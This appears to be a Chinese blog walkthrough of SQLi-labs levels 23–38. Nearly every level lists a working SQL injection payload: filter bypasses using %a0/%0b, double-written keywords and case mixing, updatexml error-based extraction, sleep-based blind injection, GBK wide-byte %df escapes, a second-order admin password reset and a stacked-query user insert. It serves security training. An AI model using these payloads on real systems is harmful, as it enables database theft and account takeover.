【SQLi-labs】Adv Injections(23-38)

Less-23

单引号闭合,过滤注释符,其中判断列数无法使用order by,同时报错位为2

id=-1' and union select 1,2,3 and '1'='1

这里显示的password为1,不是代表1为报错位,而是1=1和后面形成闭合,逻辑为1,所以是1

Less-24

密码重置漏洞,通过注册一个新的用户,在修改新用户密码的时候间接修改admin用户的密码

admin' #   //新建用户,密码123,登陆进去后点击修改密码为root

这个时候修改的密码为admin的密码,admin的密码变为root,admin’ #用户依然密码为123

Less-25

过滤and和or,通过&和||替换,单引号闭合,报错位为2,1不是报错为理由如23题

id=-1||'1
id=-1 union select 1,2,3 || '1

Less-25a

数字型闭合,and和or被替换,双写绕过

id=1 aandnd 1=2
id=1000 oorr 1=1
id=1 oorrder by 3

Less-26

过滤注释符和空格,同时还把%过滤了,单引号闭合

id=-1'||updatexml(1,concat(0x7e,database()),0)||'1'='1
id=-1'||updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)like(database()))),0)||'1'='

=通过like替换,所有有空格的命令通过()替换,information中有or双写绕过

Less-26a

单引号+空格闭合,%a0代替空格绕过

[?id=100](http://127.0.0.1/sqllib/Less-26a/?id=100)')%a0union%a0select%a01,2,3%a0(’1’)=(’1

Less-27

过滤union和select,空格,注释符,单引号闭合,报错位为2,通过大小写绕过

id=1000'%0bor%0b'1'='1
id=1000'%0bunIOn%0bSeleCt%0b1,2,3%0bor%0b'1'='1

id不能为-1是因为过滤注释符--+,所以负号也不行也不行

Less-27a

盲注,双引号闭合,过滤union和select等之前的操作

?id=1"and(if(ascii(substr(database(),1,1))=115,sleep(5),0))and"1"="1

Less-28

单引号+括号闭合,过滤union select连在一起,双写不过滤,大小写全过滤,空格过滤

?id=10000')union%0Bunion%0Bselect%0Bselect%0B1,database(),3%0Bor%0B('1')=('1

union select连在一起才过滤,所以是一起双写

Less-28a

和Less-28一样,只是过滤少了一些,不做演示

Less-29

单引号闭合,unon联合注入

id=10000' union select 1,database(),3 or '1'='1

Less-30

双引号闭合,union联合注入

id=-1" union select 1,2,3 or "1"="1

Less-31

双引号+括号闭合,union联合注入

id=-1") union select 1,2,3 or ("1")=("1

Less-32

宽字节注入,单引号闭合,union联合注入

id=-1%df' union select 1,2,3 %23

Less-33

宽字节注入,单引号闭合,报错注入

id=1%df' and updatexml(1,concat(0x7e,database()),0) %23

Less-34

宽字节注入,POST提交,报错注入

admin%df' and updatexml(1,concat(0x7e,database()),0) #

Less-35

数字型闭合,union联合注入,宽字节注入

id=-1 union select 1,2,3

Less-36

单引号闭合,宽字节注入,报错注入

id=1%df' and updatexml(1,concat(0x7e,database()),0) %23

Less-37

单引号闭合,POST提交,宽字节注入,报错注入

admin%df' and updatexml(1,concat(0x7e,database()),0) #

Less-38

单引号闭合,union联合查询

id=-1' union select 1,2,3 %23

堆叠注入

id=1';insert into users(id,username,password) values(99,'zyx','root') %23
posted @ 2022-03-20 11:36  icui4cu  阅读(39)  评论(0编辑  收藏  举报